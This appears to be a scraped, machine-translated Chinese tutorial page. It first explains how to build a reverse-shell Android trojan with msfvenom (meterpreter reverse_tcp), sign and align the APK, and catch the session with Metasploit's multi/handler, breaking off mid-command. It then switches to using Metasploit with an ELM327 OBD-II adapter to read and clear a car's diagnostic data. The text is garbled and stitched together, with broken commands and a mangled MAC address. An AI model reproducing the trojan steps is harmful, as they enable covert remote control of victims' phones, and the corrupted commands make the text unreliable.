kali linux怎么啟動metasploit 為什么有人說安卓系統(tǒng)不安全?
為什么有人說安卓系統(tǒng)不安全?謝謝邀請~ ~眾所周知,手機操作系統(tǒng)的兩大巨頭:安卓和蘋果。由于Android是開源系統(tǒng),流暢度和安全性成為用戶經(jīng)常吐槽的話題,流暢度可以從使用中得到驗證。那么為什么安全性
為什么有人說安卓系統(tǒng)不安全?
謝謝邀請~ ~
眾所周知,手機操作系統(tǒng)的兩大巨頭:安卓和蘋果。由于Android是開源系統(tǒng),流暢度和安全性成為用戶經(jīng)常吐槽的話題,流暢度可以從使用中得到驗證。那么為什么安全性比蘋果 s系統(tǒng)?我們怎么知道?現(xiàn)在邊肖將帶你驗證安卓手機的安全性。
和往常一樣,仍然需要使用kali系統(tǒng)下集成的metasploit工具生成木馬。1.打開kali,輸入命令【MSF venom-p Android/meter preter/reverse _ TCP lhost "IP "lport "卡利系統(tǒng)的港口可以自由設(shè)置,但不 不要將其設(shè)置為固定端口號aaa.apk "。安卓手機的安卓包都是以apk結(jié)尾的,所以應(yīng)該會生成以apk結(jié)尾的文件。
如果出現(xiàn)如下所示的信息,說明木馬文件已經(jīng)生成,可以從根目錄找到aaa.apk文件。
然后,您需要創(chuàng)建特洛伊木馬文件的證書和數(shù)字簽名。因為邊肖沒有學過Android開發(fā),我只是知道安裝Android軟件需要這兩樣東西,所以我可以 不要向題主和讀者解釋它們。請原諒我。
2.通過命令【keytool-genkey-v-keystore-alias AAA-keyalg RSA-keysize 1024-validity 999】創(chuàng)建一個證書。
然后配置相關(guān)信息,確認證書信息。
3.【Jarsigner-verbose-sigalgsha 1 with RSA-digestalgsha 1-keystore AAAA . apk AAA】,創(chuàng)建數(shù)字簽名。
為了保證木馬可以在大部分安卓手機上安裝運行,需要對木馬文件進行優(yōu)化。4.首先安裝zipalign工具,安裝命令是【apt-get install zipalign】。
然后就可以優(yōu)化木馬文件了。命令是[zipalign -v 4 aaa.apk aaaa.apk],如果出現(xiàn)錯誤消息,可以忽略。
5、打開安卓虛擬機,邊肖用把木馬文件傳到虛擬機,暫時沒有安裝。
6.用【使用exploit/multi/handler】加載攻擊模塊,用【設(shè)置有效載荷Android/米Preter/Reverse _ TCP】選擇有效載荷模塊。
然后在Android虛擬機中安裝木馬文件并運行。
7.返回kali系統(tǒng),執(zhí)行攻擊命令【
如何使用Metasploit進行汽車安全性測試?
步驟1:獲得OBD II連接器硬件。
首先,我們有一個可以連接到汽車ODC II連接器的設(shè)備。這里我選擇相對便宜的ODB II ELM327藍牙迷你接口。亞馬遜上的價格是8.49美元,它可以有效地與汽車的CAN網(wǎng)絡(luò)進行通信,并使用M: "。
第二步:安裝串口。
CAN協(xié)議是串行協(xié)議,所以我們需要安裝rubygem "串行端口 "。
kali gem安裝串行端口
步驟3:連接藍牙適配器
接下來,我們需要連接我們的藍牙適配器,以便與我們汽車中的ELM 327適配器進行通信。
要連接到ELM 327設(shè)備,我們需要獲取它的MAC地址。我們可以通過使用內(nèi)置的HCTooltool掃描藍牙設(shè)備來獲取MAC地址。
堿性酒精掃描
根據(jù)掃描結(jié)果,我這里的MAC地址是00 : 19 : 6 de CHO 5-@ . com 36 : 4 a: 9d。
現(xiàn)在,我們使用這個MAC地址發(fā)送我們的藍色牙科適配器連接到ELM 327設(shè)備。注意:請將MAC地址用雙引號括起來,如下所示。
kali rfcomm connect/dev/rfcomm 1 00 : 19 : 6 d: 36 : 4 a: 9d
步驟4:運行ELM 327中繼
下一步是運行ELM 327中繼,以便Metasploit可以與ELM 327芯片組通信。您可以在/usr/share/metasploit-framework/tools/hardware目錄中找到它。
kali CD/usr/share/metasploit-framework/tools/hardware kali ls-l
在運行它之前,讓 讓我們看看它的幫助信息。
kali ruby elm327_relay.rb -h
可以看到,我們只需要設(shè)置兩個參數(shù);速度(默認為115200)和串行設(shè)備(默認為/dev/ttyub0)。這里的串行設(shè)備可以通過dmesg | greptys *命令來確定。
現(xiàn)在,使用串行設(shè)備運行elm327繼電器,并將速度保持在默認值,如下所示。
kali ruby elm 327 _ relay . r b-s/dev/ttys 0第五步:啟動Metasploit。
現(xiàn)在我們已經(jīng)配置了Kali Linux來與ELM 327設(shè)備通信,我們需要創(chuàng)建一個到Metasploit的硬件橋。Metasploit是為TCP/IP通信而構(gòu)建的,現(xiàn)在我們需要它通過串口與汽車的原生CAN協(xié)議進行通信。
首先,我們啟動Metasploit。
卡利msfconsole
然后,搜索汽車模塊。
卡利搜索汽車
如你所見,汽車模塊很少,功能也很有限。
我們選擇使用輔助/客戶端/hwbridge/connect模塊。
msf使用輔助/客戶端/hwbridge/connect
加載模塊后,我們可以輸入info命令來獲取關(guān)于模塊的詳細信息。
卡利信息
最后,讓 讓我們執(zhí)行這個模塊。
Msf利用步驟6:使用Metasploit汽車模塊。
現(xiàn)在,我們已經(jīng)在車輛中創(chuàng)建了Metasploit和C。協(xié)議之間的硬件橋。所以我們可以開始使用Metasploit中的car模塊。
例如,您想要檢索車輛信息。
msf使用post/硬件/汽車/getvinfo
該模塊將查詢并收集所有車輛故障診斷碼(DTC)和其他信息,如速度、冷卻液溫度、車輛識別號(VIN ),甚至清除DTC。
現(xiàn)在,我們可以將我們的Linux系統(tǒng)和Metasploit框架直接連接到車載網(wǎng)絡(luò),直接與車載設(shè)備進行通信!